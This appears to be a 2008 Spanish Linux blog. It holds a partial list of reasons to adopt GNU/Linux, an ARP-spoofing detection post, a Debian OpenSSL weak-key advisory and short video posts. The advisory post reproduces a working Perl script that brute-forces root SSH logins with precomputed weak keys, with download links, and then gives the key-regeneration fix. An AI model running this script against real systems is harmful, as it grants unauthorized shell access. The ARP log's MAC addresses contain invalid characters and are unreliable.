8 - GNU/Linux no tiene complicados requisitos para hacer cumplir las licencias. En una empresa con cientos o miles de ordenadores, será necesario tener a un gran numero de personal solo para asegurarnos de que todos los ordenadores están cumpliendo con las complejas condiciones de autorización de uso (EULAs) para Microsoft Windows, Microsoft Office y otras aplicaciones propietarias. Con GNU/Linux no hay temor a auditorías sorpresa con posibles sanciones por violación de licencias.

9 - GNU/Linux es mucho más seguro con una muy baja tasa de infección por virus, troyanos, gusanos, software espía y otros códigos maliciosos. Esto se debe a que UNIX y todos sus descendientes (incluyendo GNU/Linux) fueron diseñados desde un principio con la seguridad en mente, en lugar de tratar de parchear graves fallos de seguridad cuando ys es demasiado tarde. Por ejemplo, los usuarios no habitúan a usar el sistema con permisos de administración, a fin de proteger los principales archivos del sistema. Incluso en el caso que la existencia de un código malicioso, este no poseería permisos suficientes para hacer mucho daño. Además un sólido firewall se incluye en las principales distribuciones y es activado por defecto. Otro factor a tener en cuenta es la libre disponibilidad del código fuente, lo que permite a miles de personas de todo el mundo poder buscar vulnerabilidades de seguridad.

10 - GNU/Linux es altamente resistente a los fallos de sistema y raramente necesita reiniciar. Esto puede ser muy importante para las grandes organizaciones para las que unos minutos de tiempo de inactividad puede suponer un coste sustancial. La razón es que GNU/Linux ha sido diseñado desde cero para ser un sistema operativo estable y robusto, incorporando todo lo aprendido en 35 años de historia de UNIX.

11 - Aunque el número y la variedad de programas para GNU/Linux aún no es tan grande como para el sistema operativo de Microsoft, ya existe una extensa selección y aumenta continuamente y cada vez más rápido a medida que más y más desarrolladores empiezan a crear programas para GNU/Linux. La mayoría de programas para GNU/Linux también son software libre y muchos de ellos tienen las mismas características y rinden igual o mejor que las ya existentes para Microsoft Windows. De hecho, los usuarios se encuentran a menudo con que todas las aplicaciones que necesitan están disponibles gratuitamente en Internet y que ya no necesitan comprar ningún software comercial.

12 - Existe una numerosa variedad de distribuciones GNU/Linux (varios cientos), cada una con su propio conjunto único de características, pero básicamente todas compatibles entre sí. Esto permite a los usuarios seleccionar las versiones que mejor respondan a sus necesidades específicas. También significa que si un distribuidor de GNU/Linux dejará de operar, todavía habría muchos otros para elegir. Por otra parte, fomenta una sana competencia entre ellas, contribuyendo así a la mejora continuada de la calidad y el rendimiento de GNU/Linux. La elección parece abrumadora pero por lo general es difícil cometer un error seleccionando una de las más populares, como Red Hat, Susu o Ubuntu.

13 - GNU/Linux cuenta con un alto grado de flexibilidad de configuración. Se puede lograr una alta personalización muy fácilmente y sin tener que modificar el código fuente. Es muy sencillo configurar GNU/Linux durante la instalación y optimizarlo para su uso como estación de trabajo, ordenador de escritorio, ordenador portátil, servidor web, servidor de base de datos, etc. Del mismo modo el aspecto y el comportamiento del escritorio, incluyendo iconos y menús puede ser configurado con un numero casi infinito de posibilidades y formas. Incluso puede hacerse parecido a Windows... Si esto no fuera suficiente, la capacidad de libre acceso al código fuente permite un grado de personalización "ilimitado".

14 - GNU/Linux utiliza formatos abiertos y estándares. Estos son aquellos que se ajustan a las normas de la industria y que pueden ser utilizados por cualquier desarrollador de software para crear programas compatibles. Es el caso de los formatos para el procesamiento de textos, hojas de calculo y otros tipos de archivos. En comparación con los formatos privativos (véase el formato DOC), el uso de estándares elimina el problema del apego a las normas privadas, con la consecuente dificultad y coste a la hora de cambiar a otro software en un futuro. El uso de formatos abiertos permite al usuario tener el control total de sus datos, en particular en el caso de que el vendedor de software decida dar por obsoleta la versión del programa, obligando al usuario a migrar todos sus datos a la nueva versión, previo pago, por supuesto...

15 - GNU/Linux es generalmente más rápido para un determinado conjunto de especificaciones de hardware. Esto es debido a una mayor optimización del código fuente.

16 - GNU/Linux cuenta con un alto grado de compatibilidad con otros sistemas operativos. Por ejemplo, se puede escribir, leer, copiar, borrar y manipular los datos existentes en una partición para Microsoft Windows, actuar como servidor para una red que contenga clientes en Windows, formatear discos duros para el uso con Windows, e incluso ejecutar los programas de Windows directamente si fuera necesario. En comparación, los sistemas operativos de Microsoft no pueden acceder a particiones de disco que contengan otros sistemas, no pueden formatear discos duros para otros sistemas, etc, etc...

17 - La ética y la moral se mantienen muy altas en el mundo GNU/Linux y en el resto del software libre debido a la gran apertura de su proceso de desarrollo y a la libre disponibilidad del código fuente. GNU/Linux nunca ha sido condenado en un tribunal por violación de leyes antimonopolio u otros delitos, ni ha tenido que pagar sanciones por la copia no autorizada de tecnología desarrollada por otras empresas. Las políticas gubernamentales antimonopolio regulan o rompen monopolios con el fin de promover la libre competencia. Los beneficios por alcanzar dicha competencia afectan a la economía y a la sociedad en su conjunto.

18 - GNU/Linux reduce la necesidad de actualizar o sustituir hardware cuando se actualiza a una nueva versión. Esto se debe a que su código fuente es muy eficiente y compacto, lo que permite que funcione en computadoras antiguas que no son adecuadas para las versiones más recientes de Microsft Windows.

19 - GNU/Linux es capaz de operar en una amplia variedad de plataformas y no solo se limita a equipos con procesadores Intel o AMD. Funciona perfectamente en una vasta variedad de equipos que van desde los superordenadores a los robots industriales, equipos médicos, teléfonos móviles (puede ejecutarse incluso en un reloj de pulsera)

20 - GNU/Linux es una mejor elección para su uso en las instituciones académicas por una serie de razones. Entre ellas se encuentra el hecho de que no hay secretos (en marcado contraste con el software privativo), con lo que los estudiantes tendrán la oportunidad de estudiar como funcionan realmente los ordenadores en lugar de simplemente aprender a usarlos. Muchos profesores están convencidos de que es mucho más importante aprender los fundamentos prácticos de la informática que aprender el uso de aplicaciones especificas (como Microsoft Word o Power Point). Una de las razones es que los fundamentos prácticos de la informática seguirán siendo validos después de muchos años, mientras que las aplicaciones (especialmente las propietarias) están en constante cambio y los conocimientos adquiridos quedarán obsoletos en pocos tiempo.

21 - Para los organismos gubernamentales, GNU/Linux permite la transparencia de los datos, ya que los almacena en formatos compatibles con toda la industria. Todo lo contrario al software comercial. Esta transparencia es importante para mantener una democracia efectiva. Esto permite a cualquier usuario acceder a los datos sin tener que comprar caros programas privativos. Por otra parte, mantenerlos en formatos estándar es mucho más seguro que hacerlo usando formatos propietarios.

22 - En GNU/Linux hay muy pocas razones para temer la existencia de puertas traseras, en parte porque todo el código fuente está disponible para su inspección. Una puerta trasera es un método secreto para obtener acceso remoto a un ordenador. Existe una (muy justificada) preocupación por parte de los gobiernos y las corporaciones de que dichas puertas traseras se han insertado de forma encubierta en el software propietario, permitiendo a los desarrolladores y a otros gobiernos a acceder a sus datos confidenciales.

23 - El uso y la promoción de GNU/Linux ayuda a fomentar una sana diversidad y aumento de competencia en toda la industria del software. Esa competencia puede promover el avance tecnológico, mejorar el rendimiento y disminuir los costes del software libre y del software propietario por igual. Tanto la teoría económica como los cientos de años de real experiencia en el mundo demuestran claramente que los monopolios no necesitan innovar, tienden a producir productos de mala calidad, inflan los precios y tienden a corromper el sistema político.

24 - GNU/Linux y el software libre no solo han alcanzado, o en algunos casos superado al software privativo, sino que también desarrollan más rápido. Esta tendencia irá a más, dado que la demanda para este tipo de software sigue creciendo y cada vez más personas y organizaciones participan activamente en su desarrollo.

25 - GNU/Linux ofrece la oportunidad de que los usuarios puedan contribuir al avance de la tecnología del software, debido a que el código fuente está disponible gratuitamente para ser estudiado, mejorado, ampliado y redistribuido. Un notable ejemplo de ello a nivel empresa ha sido IBM.

26 - Existen en realidad más de 25 razones por las que organizaciones de todo el mundo están migrando a GNU/Linux. Un vigésimo sexto motivo es que con GNU/Linux no hay necesidad de desfragmentar los discos duros a diferencia de Windows. La fragmentación, que es la difusión de datos en lugares no contiguos puede reducir la eficacia del almacenamiento de datos y ralentizar el funcionamiento de la máquina. Desfragmentar no es difícil, pero puede ser una molestia tener que hacerlo periódicamente, y no es necesario si tienes un sistema operativo bien diseñado.

He aqui las fuentes originales.

EN INGLES

EN ESPAÑOL.

Detectando ARP Spoofing

noreply@blogger.com (zerial killer) — Sat, 17 May 2008 18:09:00 +0000

Estas son dos de las formas mas fáciles que e encontrado para detectar el arp spoofing, son utilizando las herramientas de arpwatch y arpalert. Las puedes instalar en Debian desde synaptic o bien.

#apt-get install arpwatch
#apt-get install arpalert

ambos mandan alertas a /etc/log/syslog puedes hacerte un script para mandar las salidas a a otro archivo y también editar sus .conf en /etc/arpalert y /etc/arpwatch.conf . Puedes ver los manuales oficiales de ellos.

#man arpalert
#man arpwatch

Aquí esta la salida de syslog para ambos archivos arp mandándoles la orden que lean la interfaz eth2

#arpalert -i eth2 {cambias la interfaz por la que te interese que este ala escucha}
#arpalert -i eth2

#cat /var/log/syslog | grep arp

May 17 13:12:40 zk kernel: Measured 4131621884 cycles TSC warp between CPUs, turning off TSC clock.
May 17 13:43:59 zk arpalert: Auto selected device: eth1
May 17 13:43:59 zk arpwatch: bad interface eth1: eth1: no IPv4 address assigned - assuming unconfigured interface
May 17 13:43:59 zk arpwatch: Running as uid=115 gid=121
May 17 13:43:59 zk arpwatch: listening on eth1
May 17 13:43:59 zk arpwatch: exiting
May 17 13:44:16 zk arpalert: Auto selected device: eth1
May 17 13:44:16 zk arpalert: daemon instance already running (file: /var/run/arpalert.pid locked)
May 17 13:44:34 zk arpwatch: bad interface eth1: eth1: no IPv4 address assigned - assuming unconfigured interface
May 17 13:44:34 zk arpwatch: listening on eth1
May 17 13:44:57 zk arpwatch: exiting
May 17 14:41:04 zk arpalert: Selected device: eth2
May 17 14:41:04 zk arpalert: daemon instance already running (file: /var/run/arpalert.pid locked)
May 17 14:41:42 zk arpwatch: listening on eth2
May 17 14:42:10 zk arpwatch: new station 192.168.0.11 0:38:de:34:46:g7 eth2
May 17 14:42:10 zk arpwatch: new station 192.168.0.1 0:44:54:84:F3:c5 eth2
May 17 14:43:13 zk arpwatch: bogon 1.15.54.18 0:44:4:34:14:c3 eth2
May 17 14:55:14 zk arpwatch: bogon 1.15.54.18 0:44:45:y4:d3:56 eth2
May 17 15:07:27 zk arpwatch: bogon 1.15.54.18 0:1e:45:y4:t3:56 eth2
May 17 15:10:15 zk arpwatch: bogon 1.15.54.18 0:64:43:8a:1y:t6 eth2
May 17 15:14:38 zk arpalert: Auto selected device: eth1
May 17 15:14:38 zk arpalert: daemon instance already running (file: /var/run/arpalert.pid locked)
May 17 15:25:16 zk arpwatch: bogon 1.15.54.18 0:44:74:w4:13:56 eth2
May 17 15:30:36 zk arpwatch: bogon 1.15.54.18 0:d4:48:e4:13:56 eth2

[SECURITY] [DSA 1571-1] New openssl packages fix predictable random number generator

noreply@blogger.com (zerial killer) — Thu, 15 May 2008 19:54:00 +0000

Vulnerabilidad crítica en las claves OpenSSL de Debian y las basadas en debian tambien.

Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 7.10 sparc
Ubuntu Ubuntu Linux 7.10 powerpc
Ubuntu Ubuntu Linux 7.10 lpia
Ubuntu Ubuntu Linux 7.10 i386
Ubuntu Ubuntu Linux 7.10 amd64
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu Linux 7.04 powerpc
Ubuntu Ubuntu Linux 7.04 i386
Ubuntu Ubuntu Linux 7.04 amd64
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0

Anuncio en debian

en MilwOrm

the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.

This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.

On an unpatched system, which doesn't need to be debian, do the following:

keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)

4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.

#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By mm@deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,
Markus Mueller
mm@deadbeef.de

# milw0rm.com [2008-05-15]

Yo en mi sistema hice lo siguiente:

# rm /etc/ssh/ssh_host_*

Y después las he regenerado con:

# dpkg-reconfigure -plow openssh-server

Y todo perfecto.

Esto lo leei en un post de haplo en esDebian

Excelente video, esta para llorar.

noreply@blogger.com (zerial killer) — Wed, 07 May 2008 04:23:00 +0000

Excelente vídeo este vídeo tiene mas de medio año que lo avía visto y hoy no se porque me acorde del, y decidí ponerlo en el blog para que la gente lo pudiera apreciar también, espero les guste tanto como a mi.

otro en link al mismo video.

VIDEO AQUI y AQUI

No mames .....

noreply@blogger.com (zerial killer) — Mon, 05 May 2008 21:35:00 +0000

HAAAAAA NO MAMES SIEMPREEEEE.............